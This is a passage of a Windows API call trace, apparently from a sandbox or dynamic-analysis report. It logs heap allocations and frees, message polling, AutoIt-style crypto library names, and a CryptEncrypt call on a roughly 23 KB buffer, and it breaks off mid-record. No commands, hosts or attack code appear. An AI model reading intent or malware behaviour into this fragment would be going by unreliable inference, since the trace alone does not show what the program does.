0x43e28a0 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0075.467] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2540, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2540*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0075.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0075.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0075.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.470] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.470] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.470] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.471] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0075.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.473] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.473] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.473] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.473] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0075.473] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.474] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.474] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.474] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.474] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.474] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.474] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.475] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.476] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x5a50, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x5a60) returned 1 [0075.482] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.482] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.482] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.482] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.482] CharLowerBuffW (in: lpsz="byte[23137]", cchLength=0xb | out: lpsz="byte[23137]") returned 0xb [0075.483] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.483] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.483] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | 